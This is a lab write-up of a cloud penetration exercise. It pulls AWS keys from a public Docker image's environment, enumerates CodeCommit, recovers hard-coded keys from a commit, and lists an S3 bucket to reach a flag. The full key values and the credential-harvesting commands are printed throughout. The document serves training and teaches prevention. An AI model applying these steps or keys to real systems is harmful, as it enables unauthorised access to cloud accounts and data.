Pwned Labs - Uncover Secrets in CodeCommit and Docker

Scenario

Huge Logistics has engaged your team for a security assessment. Your primary objective is to scrutinize their public repositories for overlooked credentials or sensitive information. If you discover any, use them to gain initial access to their cloud infrastructure. From there, focus on lateral and vertical movement to demonstrate impact. Your aim is to identify any security gaps so they can be closed off.

Learning Outcomes

- Interacting with and getting secrets from Docker containers

- Enumerating and getting secrets from AWS CodeCommit

- An understanding of how this could have been prevented

Real World Context

Containerization has emerged as a foundational element for interconnected services, with Docker standing out as the leading containerization platform. Docker Hub hosts more than 9,000,000 images that anybody can use. In a study of container security, researchers from RWTH Aachen University examined 337,171 images from Docker Hub along with 8,076 from private repositories. They discovered that over 8% of these images contained confidential data, such as private keys and API secrets. Specifically, they identified 52,107 private keys and 3,158 exposed API secrets. Of those API secrets, 2,920 belong to cloud providers, including 1,213 secrets for the AWS API.

Entry Point

Attack



Docker Hub (Graphical)

We start by searching Docker Hub for images that could be related to Huge Logistics. We get a hit among the community images, as shown below:



The name is interesting: Terraform is used for infrastructure provisioning, so there is a good chance the image contains something of interest. Looking at the Tags tab, we see just one tag, 0.12.

Docker CLI

The docker search command returns the same result from the CLI:

❯ docker search "huge logistics"

NAME DESCRIPTION STARS OFFICIAL AUTOMATED

hugecannon/factorio Runs factorio game server 8 [OK]

hugegraph/hugegraph Apache HugeGraph-Server Official Version 5

hugegraph/busybox test image 2

hugegraph/hugegraph-computer-operator Apache HugeGraph Computer Operator Image 1

hugegraph/hubble Apache HugeGraph analysis dashboard (data lo… 1

hljose/huge-logistics-terraform-runner Huge Logistics Terraform Runner 0

omarqazi/logistics 0

esignbr/logistics-test-selenium Project for UI testing the Logistics applica… 0

< -- snip -- >

We can also view information about the tags through the Docker Hub API:

❯ curl -s https://hub.docker.com/v2/repositories/hljose/huge-logistics-terraform-runner/tags | jq .

{

"count": 1,

"next": null,

"previous": null,

"results": [

{

"creator": 22687041,

"id": 478187065,

"images": [

{

"architecture": "amd64",

"features": "",

"variant": null,

"digest": "sha256:9f2719775ca8537023b9f1c126a2b36d6b59998d9e54e3d2e0b87b0d80e75707",

"os": "linux",

"os_features": "",

"os_version": null,

"size": 53176705,

"status": "active",

"last_pulled": "2024-07-07T12:21:24.015417Z",

"last_pushed": "2023-07-19T22:30:57.409626Z"

}

],

"last_updated": "2023-07-19T22:30:57.527145Z",

"last_updater": 22687041,

"last_updater_username": "hljose",

"name": "0.12",

"repository": 20534833,

"full_size": 53176705,

"v2": true,

"tag_status": "active",

"tag_last_pulled": "2024-07-07T12:21:24.015417Z",

"tag_last_pushed": "2023-07-19T22:30:57.527145Z",

"media_type": "application/vnd.docker.container.image.v1+json",

"content_type": "image",

"digest": "sha256:9f2719775ca8537023b9f1c126a2b36d6b59998d9e54e3d2e0b87b0d80e75707"

}

]

}
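
The fields that matter most in this response are the tag name, the digest, and the size. As a minimal sketch, assuming the response has already been saved or fetched as JSON, the helper below (summarize_tags is a hypothetical name, not part of any Docker tooling) pulls those three fields out of each entry in results. The sample is a trimmed copy of the response shown above.

```python
import json


def summarize_tags(response: dict) -> list[tuple[str, str, int]]:
    """Return (tag name, digest, full size in bytes) for each tag in a tags response."""
    return [
        (tag["name"], tag["digest"], tag["full_size"])
        for tag in response.get("results", [])
    ]


# Trimmed copy of the Docker Hub tags response shown above.
sample = json.loads("""
{
  "count": 1,
  "results": [
    {
      "name": "0.12",
      "full_size": 53176705,
      "digest": "sha256:9f2719775ca8537023b9f1c126a2b36d6b59998d9e54e3d2e0b87b0d80e75707"
    }
  ]
}
""")

for name, digest, size in summarize_tags(sample):
    # Shorten the digest for display and convert bytes to megabytes.
    print(f"{name}  {digest[:19]}  {size / 1_000_000:.1f} MB")
```

For a repository with many tags, the same helper could be applied to each page of results, following the next field until it is null.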

Now that we have seen a couple of ways to get this information, let's pull the image from the registry.

❯ docker pull hljose/huge-logistics-terraform-runner:0.12

0.12: Pulling from hljose/huge-logistics-terraform-runner

31e352740f53: Pulling fs layer

733c1bd26773: Pulling fs layer

3ee224966b84: Pulling fs layer

661b6e1c6136: Waiting

e3f8a0cccb2d: Waiting

dc8d5954d00c: Waiting

1630fa498485: Waiting

We can also run docker scout. As I am not using Docker Desktop, it has to be installed manually, which we can do with the following commands:

curl -fsSL https://raw.githubusercontent.com/docker/scout-cli/main/install.sh -o install-scout.sh

sh install-scout.sh

Once it is installed, we run docker scout --help to see the available commands:

❯ docker scout --help

Command line tool for Docker Scout

Usage

docker scout [command]

Available Commands

attestation Manage attestations on image indexes

cache Manage Docker Scout cache and temporary files

compare Compare two images and display differences (experimental)

config Manage Docker Scout configuration

cves Display CVEs identified in a software artifact

enroll Enroll an organization with Docker Scout

environment Manage environments (experimental)

help Display information about the available commands

integration Commands to list, configure, and delete Docker Scout integrations

policy Evaluate policies against an image and display the policy evaluation results (experimental)

push Push an image or image index to Docker Scout (experimental)

quickview Quick overview of an image

recommendations Display available base image updates and remediation recommendations

repo Commands to list, enable, and disable Docker Scout on repositories

version Show Docker Scout version information

Use "docker scout [command] --help" for more information about a command.

Learn More

Read docker scout cli reference at https://docs.docker.com/engine/reference/commandline/scout/

Report Issues

Raise bugs and feature requests at https://github.com/docker/scout-cli/issues

Send Feedback

Send feedback with docker feedback

Two commands look interesting, quickview and cves, so we will run both against the image.

You must be logged into Docker via the CLI to run docker scout.

❯ docker scout quickview hljose/huge-logistics-terraform-runner:0.12

✓ Image stored for indexing

✓ Indexed 93 packages

i Base image was auto-detected. To get more accurate results, build images with max-mode provenance attestations.

Review docs.docker.com ↗ for more information.

Target │ hljose/huge-logistics-terraform-runner:0.12 │ 3C 6H 19M 1L 5?

digest │ 31bd0544dff8 │

Base image │ alpine:3 │ 2C 1H 10M 0L 4?

Refreshed base image │ alpine:3 │ 1C 0H 0M 0L

│ │ -1 -1 -10 -4

Updated base image │ alpine:3.19 │ 1C 0H 0M 0L 1?

│ │ -1 -1 -10 -3

What's next:

View vulnerabilities → docker scout cves hljose/huge-logistics-terraform-runner:0.12

View base image update recommendations → docker scout recommendations hljose/huge-logistics-terraform-runner:0.12

Include policy results in your quickview by supplying an organization → docker scout quickview hljose/huge-logistics-terraform-runner:0.12 --org <organization>

List of CVEs

❯ docker scout cves hljose/huge-logistics-terraform-runner:0.12

✓ SBOM of image already cached, 93 packages indexed

✗ Detected 9 vulnerable packages with a total of 34 vulnerabilities

## Overview

│ Analyzed Image

────────────────────┼────────────────────────────────────────────────

Target │ hljose/huge-logistics-terraform-runner:0.12

digest │ 31bd0544dff8

platform │ linux/amd64

vulnerabilities │ 3C 6H 19M 1L 5?

size │ 62 MB

packages │ 93

## Packages and Vulnerabilities

1C 1H 6M 0L 4? openssl 3.1.1-r1

pkg:apk/alpine/openssl@3.1.1-r1?os_name=alpine&os_version=3.18

✗ CRITICAL CVE-2024-5535

https://scout.docker.com/v/CVE-2024-5535

Affected range : <3.1.6-r0

Fixed version : 3.1.6-r0

< -- snip -- >

There is a wealth of information here, which would be useful if this container were running in an environment we had access to. For now we have gathered plenty of information about the image, so let's run it and see what we can find inside.

❯ docker run --rm -it hljose/huge-logistics-terraform-runner:0.12 /bin/bash

e918506ff677:/# ls

bin etc lib mnt proc run srv tmp var

dev home media opt root sbin sys usr workspace

We look at the workspace folder, but there is nothing there. Looking around further, we find a .gitconfig file in the /root directory, and the environment variables contain AWS credentials.

e918506ff677:~# ls -la

total 16

drwx------ 1 root root 4096 Jul 19 2023 .

drwxr-xr-x 1 root root 4096 Jul 9 07:57 ..

drwxr-xr-x 3 root root 4096 Jul 19 2023 .cache

-rw-r--r-- 1 root root 80 Jul 19 2023 .gitconfig

e918506ff677:~# cat .gitconfig

[credential]

helper = !aws codecommit credential-helper $@

UseHttpPath = true

e918506ff677:~# env

HOSTNAME=e918506ff677

AWS_DEFAULT_REGION=us-east-1

PWD=/root

HOME=/root

AWS_SECRET_ACCESS_KEY=iupVtWDRuAvxWZQRS8fk8FaqgC1hh6Pf3YYgoNX1

TERM=xterm

SHLVL=1

AWS_ACCESS_KEY_ID=AKIA3NRSK2PTOA5KVIUF

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

_=/usr/bin/env

OLDPWD=/home

We load the credentials we found and confirm that they are valid:

❯ aws --profile pentester configure

AWS Access Key ID [None]: AKIA3NRSK2PTOA5KVIUF

AWS Secret Access Key [None]: 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

Default region name [None]: us-east-1

Default output format [None]:

❯ aws --profile pentester sts get-caller-identity

{

"UserId": "AIDA3NRSK2PTAUXNEJTBN",

"Account": "785010840550",

"Arn": "arn:aws:iam::785010840550:user/prod-deploy"

}

Instead of manually inspecting the container, we could also have obtained the credentials with the docker inspect hljose/huge-logistics-terraform-runner:0.12 command, because environment variables set at build time are stored in the image configuration:

< -- snip -- >

"Config": {

"Hostname": "",

"Domainname": "",

"User": "",

"AttachStdin": false,

"AttachStdout": false,

"AttachStderr": false,

"Tty": false,

"OpenStdin": false,

"StdinOnce": false,

"Env": [

"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",

"AWS_ACCESS_KEY_ID=AKIA3NRSK2PTOA5KVIUF",

"AWS_SECRET_ACCESS_KEY=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",

"AWS_DEFAULT_REGION=us-east-1"

],

"Cmd": [

"/bin/bash"

],

"ArgsEscaped": true,

"Image": "",

"Volumes": {

"/workspace": {}

},

"WorkingDir": "",

"Entrypoint": null,

"OnBuild": null,

"Labels": {

"description": "Feature-packed DevOps Docker image with AWS, Azure, GCP CLI tools, Terraform, and common utilities.",

"maintainer": "jose@huge-logistics.com"

}

},

< -- snip -- >
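
Picking secrets out of a long docker inspect dump by eye is easy to get wrong. As a rough sketch, the helper below reads docker inspect JSON and returns the Config.Env entries whose names look sensitive. The function name find_secret_env and the keyword list are assumptions made for illustration, and the sample uses AWS's documented placeholder keys rather than the values found in the image.

```python
import json
import re

# Name fragments that commonly indicate a secret; a hypothetical starting list.
SUSPICIOUS = re.compile(r"KEY|SECRET|TOKEN|PASSWORD", re.IGNORECASE)


def find_secret_env(inspect_output: str) -> dict[str, str]:
    """Return env vars from `docker inspect` JSON whose names look sensitive."""
    found = {}
    for image in json.loads(inspect_output):  # docker inspect prints a JSON array
        for entry in (image.get("Config") or {}).get("Env") or []:
            name, _, value = entry.partition("=")
            if SUSPICIOUS.search(name):
                found[name] = value
    return found


# Same shape as the Config.Env block above, with placeholder credentials.
sample = json.dumps([{
    "Config": {
        "Env": [
            "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
            "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE",
            "AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
            "AWS_DEFAULT_REGION=us-east-1",
        ]
    }
}])

print(sorted(find_secret_env(sample)))
```

Matching on variable names is a heuristic: it will miss secrets stored under innocuous names and can flag harmless variables, so the results still need a manual look.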

Now that we have credentials, let's use aws-enumerator to see what permissions we have. First we add our credentials, and then we enumerate.

❯ aws-enumerator cred -aws_region us-east-1 -aws_access_key_id AKIA3NRSK2PTOA5KVIUF -aws_secret_access_key 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

Message: File .env with AWS credentials were created in current folder

# Filtered list of results

❯ aws-enumerator enum -services all

Message: Successful CODECOMMIT: 1 / 2

Message: Successful DYNAMODB: 1 / 5

Message: Successful STS: 2 / 2

Time: 1m8.265975631s

Message: Enumeration finished

We have permissions on three services, so we dig into these further and see that we are able to call ListRepositories.

❯ aws-enumerator dump -services codecommit, dynamodb, sts

-------------------------------------------------- CODECOMMIT --------------------------------------------------

ListRepositories

----------------------------------------------------------------------------------------------------------------

As we have CodeCommit permissions, we use the AWS CLI to list the repositories and see that we have access to vessel-tracking.

❯ aws --profile pentester codecommit list-repositories

{

"repositories": [

{

"repositoryName": "vessel-tracking",

"repositoryId": "beb7df6c-e3a2-4094-8fc5-44451afc38d3"

}

]

}

We get the repository metadata and see the defaultBranch, which raises the question: are there other branches?

❯ aws --profile pentester codecommit get-repository --repository-name vessel-tracking

{

"repositoryMetadata": {

"accountId": "785010840550",

"repositoryId": "beb7df6c-e3a2-4094-8fc5-44451afc38d3",

"repositoryName": "vessel-tracking",

"repositoryDescription": "Vessel Tracking App",

"defaultBranch": "master",

"lastModifiedDate": "2023-07-21T01:50:46.826000+08:00",

"creationDate": "2023-07-20T05:11:19.845000+08:00",

"cloneUrlHttp": "https://git-codecommit.us-east-1.amazonaws.com/v1/repos/vessel-tracking",

"cloneUrlSsh": "ssh://git-codecommit.us-east-1.amazonaws.com/v1/repos/vessel-tracking",

"Arn": "arn:aws:codecommit:us-east-1:785010840550:vessel-tracking",

"kmsKeyId": "alias/aws/codecommit"

}

}

Listing the branches shows that there is also a dev branch, so let's check that out.

❯ aws --profile pentester codecommit list-branches --repository-name vessel-tracking

{

"branches": [

"master",

"dev"

]

}

We get the branch, which gives us a commitId.

❯ aws --profile pentester codecommit get-branch --repository-name vessel-tracking --branch-name dev

{

"branch": {

"branchName": "dev",

"commitId": "b63f0756ce162a3928c4470681cf18dd2e4e2d5a"

}

}

We look at the commit, and there is a message, Allow S3 call to work universally, which could be an indication that credentials have been hard-coded.

❯ aws --profile pentester codecommit get-commit --commit-id b63f0756ce162a3928c4470681cf18dd2e4e2d5a --repository-name vessel-tracking

{

"commit": {

"commitId": "b63f0756ce162a3928c4470681cf18dd2e4e2d5a",

"treeId": "5718a0915f230aa9dd0292e7f311cb53562bb885",

"parents": [

"2272b1b6860912aa3b042caf9ee3aaef58b19cb1"

],

"message": "Allow S3 call to work universally\n",

"author": {

"name": "Jose Martinez",

"email": "jose@pwnedlabs.io",

"date": "1689875383 +0100"

},

"committer": {

"name": "Jose Martinez",

"email": "jose@pwnedlabs.io",

"date": "1689875383 +0100"

},

"additionalData": ""

}

}
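
The author and committer dates in this output use git's raw format: seconds since the Unix epoch followed by a UTC offset. A small sketch for turning that into a readable timestamp is shown below; parse_git_date is a hypothetical helper name, and it assumes the offset always carries an explicit sign, as it does here.

```python
from datetime import datetime, timedelta, timezone


def parse_git_date(raw: str) -> datetime:
    """Parse a git-style '<epoch seconds> <+HHMM>' string into an aware datetime."""
    epoch, offset = raw.split()
    sign = -1 if offset[0] == "-" else 1
    delta = timedelta(hours=int(offset[1:3]), minutes=int(offset[3:5]))
    return datetime.fromtimestamp(int(epoch), tz=timezone(sign * delta))


# Date string taken from the commit shown above.
print(parse_git_date("1689875383 +0100").isoformat())
```

Readable timestamps make it easier to line up commits with other events in the environment, such as when the bucket objects or the Docker image were last modified.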

We get the differences between this commit and its parent and see that the change was to js/server.js, so we will now retrieve that file.

❯ aws --profile pentester codecommit get-differences --repository-name vessel-tracking --before-commit-specifier 2272b1b6860912aa3b042caf9ee3aaef58b19cb1 --after-commit-specifier b63f0756ce162a3928c4470681cf18dd2e4e2d5a

{

"differences": [

{

"beforeBlob": {

"blobId": "4381be5cc1992c598de5b7a6b73ebb438b79daba",

"path": "js/server.js",

"mode": "100644"

},

"afterBlob": {

"blobId": "39bb76cad12f9f622b3c29c1d07c140e5292a276",

"path": "js/server.js",

"mode": "100644"

},

"changeType": "M"

}

]

}
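
When a commit touches many files, the get-differences output gets long. As a minimal sketch, assuming the JSON response has been loaded into a dictionary, the hypothetical helper changed_paths below reduces it to a list of change types and paths. It falls back to beforeBlob because a deleted file has no afterBlob.

```python
def changed_paths(response: dict) -> list[tuple[str, str]]:
    """Return (change type, path) for each entry in a get-differences response."""
    results = []
    for diff in response.get("differences", []):
        # Deleted files only carry a beforeBlob, so fall back to it.
        blob = diff.get("afterBlob") or diff.get("beforeBlob") or {}
        results.append((diff.get("changeType", "?"), blob.get("path", "")))
    return results


# Trimmed copy of the response shown above.
sample = {
    "differences": [
        {
            "beforeBlob": {"blobId": "4381be5cc1992c598de5b7a6b73ebb438b79daba", "path": "js/server.js"},
            "afterBlob": {"blobId": "39bb76cad12f9f622b3c29c1d07c140e5292a276", "path": "js/server.js"},
            "changeType": "M",
        }
    ]
}

for change_type, path in changed_paths(sample):
    print(change_type, path)
```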

We retrieve the file; its content is base64 encoded.

❯ aws --profile pentester codecommit get-file --repository-name vessel-tracking --commit-specifier b63f0756ce162a3928c4470681cf18dd2e4e2d5a --file-path js/server.js

{

"commitId": "b63f0756ce162a3928c4470681cf18dd2e4e2d5a",

"blobId": "39bb76cad12f9f622b3c29c1d07c140e5292a276",

"filePath": "js/server.js",

"fileMode": "NORMAL",

"fileSize": 1702,

"fileContent": "Y29uc3QgZXhwcmVzcyA9IHJlcXVpcmUoJ2V4cHJlc3MnKTsKY29uc3QgYXhpb3MgPSByZXF1aXJlKCdheGlvcycpOwpjb25zdCBBV1MgPSByZXF1aXJlKCdhd3Mtc2RrJyk7CmNvbnN0IHsgdjQ6IHV1aWR2NCB9ID0gcmVxdWlyZSgndXVpZCcpOwpyZXF1aXJlKCdkb3RlbnYnKS5jb25maWcoKTsKCmNvbnN0IGFwcCA9IGV4cHJlc3MoKTsKY29uc3QgUE9SVCA9IHByb2Nlc3MuZW52LlBPUlQgfHwgMzAwMDsKCi8vIEFXUyBTZXR1cApjb25zdCBBV1NfQUNDRVNTX0tFWSA9ICdBS0lBM05SU0syUFRMR0FXV0xURyc7CmNvbnN0IEFXU19TRUNSRVRfS0VZID0gJzJ3Vnd3NVZFQWM2NWVXV21oc3VVVXZGRVRUNyt5bVlHTGptZUNoYXMnOwoKQVdTLmNvbmZpZy51cGRhdGUoewogICAgcmVnaW9uOiAndXMtZWFzdC0xJywgIC8vIENoYW5nZSB0byB5b3VyIHJlZ2lvbgogICAgYWNjZXNzS2V5SWQ6IEFXU19BQ0NFU1NfS0VZLAogICAgc2VjcmV0QWNjZXNzS2V5OiBBV1NfU0VDUkVUX0tFWQp9KTsKY29uc3QgczMgPSBuZXcgQVdTLlMzKCk7CgphcHAudXNlKChyZXEsIHJlcywgbmV4dCkgPT4gewogICAgLy8gR2VuZXJhdGUgYSByZXF1ZXN0IElECiAgICByZXEucmVxdWVzdElEID0gdXVpZHY0KCk7CiAgICBuZXh0KCk7Cn0pOwoKYXBwLmdldCgnL3Zlc3NlbC86bXNzaScsIGFzeW5jIChyZXEsIHJlcykgPT4gewogICAgdHJ5IHsKICAgICAgICBjb25zdCBtc3NpID0gcmVxLnBhcmFtcy5tc3NpOwoKICAgICAgICAvLyBGZXRjaCBkYXRhIGZyb20gTWFyaW5lVHJhZmZpYyBBUEkKICAgICAgICBsZXQgcmVzcG9uc2UgPSBhd2FpdCBheGlvcy5nZXQoYGh0dHBzOi8vYXBpLm1hcmluZXRyYWZmaWMuY29tL3Zlc3NlbC8ke21zc2l9YCwgewogICAgICAgICAgICBoZWFkZXJzOiB7ICdBcGktS2V5JzogcHJvY2Vzcy5lbnYuTUFSSU5FX0FQSV9LRVkgfQogICAgICAgIH0pOwoKICAgICAgICBsZXQgZGF0YSA9IHJlc3BvbnNlLmRhdGE7IC8vIE1vZGlmeSBhcyBwZXIgYWN0dWFsIEFQSSByZXNwb25zZSBzdHJ1Y3R1cmUKCiAgICAgICAgLy8gVXBsb2FkIHRvIFMzCiAgICAgICAgbGV0IHBhcmFtcyA9IHsKICAgICAgICAgICAgQnVja2V0OiAndmVzc2VsLXRyYWNraW5nJywKICAgICAgICAgICAgS2V5OiBgJHttc3NpfS5qc29uYCwKICAgICAgICAgICAgQm9keTogSlNPTi5zdHJpbmdpZnkoZGF0YSksCiAgICAgICAgICAgIENvbnRlbnRUeXBlOiAiYXBwbGljYXRpb24vanNvbiIKICAgICAgICB9OwoKICAgICAgICBzMy5wdXRPYmplY3QocGFyYW1zLCBmdW5jdGlvbiAoZXJyLCBzM2RhdGEpIHsKICAgICAgICAgICAgaWYgKGVycikgcmV0dXJuIHJlcy5zdGF0dXMoNTAwKS5qc29uKGVycik7CiAgICAgICAgICAgIAogICAgICAgICAgICAvLyBTZW5kIGRhdGEgdG8gZnJvbnRlbmQKICAgICAgICAgICAgcmVzLmpzb24oewogICAgICAgICAgICAgICAgZGF0YSwKICAgICAgICAgICAgICAgIHJlcXVlc3RJRDogcmVxLnJlcXVlc3RJRAogICAg
ICAgICAgICB9KTsKICAgICAgICB9KTsKCiAgICB9IGNhdGNoIChlcnJvcikgewogICAgICAgIHJlcy5zdGF0dXMoNTAwKS5qc29uKHsgZXJyb3I6ICJFcnJvciBmZXRjaGluZyB2ZXNzZWwgZGF0YS4iIH0pOwogICAgfQp9KTsKCmFwcC5saXN0ZW4oUE9SVCwgKCkgPT4gewogICAgY29uc29sZS5sb2coYFNlcnZlciBpcyBydW5uaW5nIG9uIFBPUlQgJHtQT1JUfWApOwp9KTsKCg=="

}
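
The fileContent field holds the file as base64, so it needs decoding before it can be read. One way to do that, sketched here with Python's standard library, is shown below. The helper name decode_file_content is hypothetical, and the sample contains only the first 48 characters of the fileContent above rather than the whole blob.

```python
import base64
import json


def decode_file_content(get_file_json: str) -> str:
    """Decode the base64 fileContent field of a CodeCommit get-file response."""
    response = json.loads(get_file_json)
    # b64decode discards characters outside the base64 alphabet by default,
    # so content that was wrapped with line breaks still decodes.
    return base64.b64decode(response["fileContent"]).decode("utf-8")


# Only the first line of the real file, to keep the example short.
sample = json.dumps({
    "filePath": "js/server.js",
    "fileContent": "Y29uc3QgZXhwcmVzcyA9IHJlcXVpcmUoJ2V4cHJlc3MnKTsK",
})

print(decode_file_content(sample), end="")
```

In practice the JSON would come from saving the CLI output to a file, or the field could be extracted with the CLI's --query option and piped to a base64 decoder.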

We decode the content and see that the file has an AWS access key and secret key hard-coded.

const express = require('express');

const axios = require('axios');

const AWS = require('aws-sdk');

const { v4: uuidv4 } = require('uuid');

require('dotenv').config();

const app = express();

const PORT = process.env.PORT || 3000;

// AWS Setup

const AWS_ACCESS_KEY = 'AKIA3NRSK2PTLGAWWLTG';

const AWS_SECRET_KEY = '2wVww5VEAc65eWWmhsuUUvFETT7+ymYGLjmeChas';

AWS.config.update({

region: 'us-east-1', // Change to your region

accessKeyId: AWS_ACCESS_KEY,

secretAccessKey: AWS_SECRET_KEY

});

const s3 = new AWS.S3();

app.use((req, res, next) => {

// Generate a request ID

req.requestID = uuidv4();

next();

});

app.get('/vessel/:mssi', async (req, res) => {

try {

const mssi = req.params.mssi;

// Fetch data from MarineTraffic API

let response = await axios.get(`https://api.marinetraffic.com/vessel/${mssi}`, {

headers: { 'Api-Key': process.env.MARINE_API_KEY }

});

let data = response.data; // Modify as per actual API response structure

// Upload to S3

let params = {

Bucket: 'vessel-tracking',

Key: `${mssi}.json`,

Body: JSON.stringify(data),

ContentType: "application/json"

};

s3.putObject(params, function (err, s3data) {

if (err) return res.status(500).json(err);

// Send data to frontend

res.json({

data,

requestID: req.requestID

});

});

} catch (error) {

res.status(500).json({ error: "Error fetching vessel data." });

}

});

app.listen(PORT, () => {

console.log(`Server is running on PORT ${PORT}`);

});
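
On the prevention side, a hard-coded key like the one above can often be caught before it is committed. The sketch below is one simple approach, not a replacement for a dedicated secret scanner: it searches source text for strings shaped like AWS access key IDs (20 characters beginning with AKIA or ASIA). The function name find_access_key_ids is hypothetical, and the snippet uses AWS's documented placeholder key.

```python
import re

# Long-term AWS access key IDs start with "AKIA"; temporary ones with "ASIA".
ACCESS_KEY_ID = re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b")


def find_access_key_ids(source: str) -> list[tuple[int, str]]:
    """Return (line number, key ID) for every access key ID pattern in source."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in ACCESS_KEY_ID.finditer(line):
            hits.append((lineno, match.group()))
    return hits


# Shaped like the AWS setup lines in server.js, with a placeholder key.
snippet = """\
// AWS Setup
const AWS_ACCESS_KEY = 'AKIAIOSFODNN7EXAMPLE';
const PORT = process.env.PORT || 3000;
"""

for lineno, key_id in find_access_key_ids(snippet):
    print(f"line {lineno}: possible hard-coded access key ID {key_id}")
```

A check like this could run as a pre-commit hook or in CI. The more durable fix is to keep keys out of the source entirely, for example by reading them from the environment, as server.js already does for MARINE_API_KEY, or by using an IAM role.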

We add the credentials and verify them; they belong to the code-admin user.

❯ aws --profile codecommit configure

AWS Access Key ID [None]: AKIA3NRSK2PTLGAWWLTG

AWS Secret Access Key [None]: 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

Default region name [None]: us-east-1

Default output format [None]:

❯ aws --profile codecommit sts get-caller-identity

{

"UserId": "AIDA3NRSK2PTJN636WIHU",

"Account": "785010840550",

"Arn": "arn:aws:iam::785010840550:user/code-admin"

}

Note that server.js references an S3 bucket, vessel-tracking. We list it and find the flag.

❯ aws --profile codecommit s3 ls s3://vessel-tracking

2023-07-21 02:25:17 32 flag.txt

2023-07-21 02:35:56 21810 vessel-id-ae

2023-07-21 02:35:57 21770 vessel-id-af

2023-07-21 02:35:58 21515 vessel-id-ag

2023-07-21 02:35:58 21639 vessel-id-ah

2023-07-21 02:35:59 21568 vessel-id-ai

2023-07-21 02:36:00 21813 vessel-id-aj

2023-07-21 02:36:01 21575 vessel-id-ak

2023-07-21 02:36:01 21871 vessel-id-al

2023-07-21 02:36:02 21523 vessel-id-am

2023-07-21 02:36:03 21606 vessel-id-an

2023-07-21 02:36:04 21675 vessel-id-ao

2023-07-21 02:36:04 21313 vessel-id-ap

2023-07-21 02:36:05 21384 vessel-id-aq

2023-07-21 02:36:06 21573 vessel-id-ar

2023-07-21 02:36:07 21771 vessel-id-as

2023-07-21 02:36:07 21409 vessel-id-at

2023-07-21 02:36:08 21672 vessel-id-au

2023-07-21 02:36:08 21522 vessel-id-av

2023-07-21 02:36:09 21515 vessel-id-aw

2023-07-21 02:36:10 21482 vessel-id-ax

2023-07-21 02:36:10 21545 vessel-id-ay

We can now download the flag. PWNED!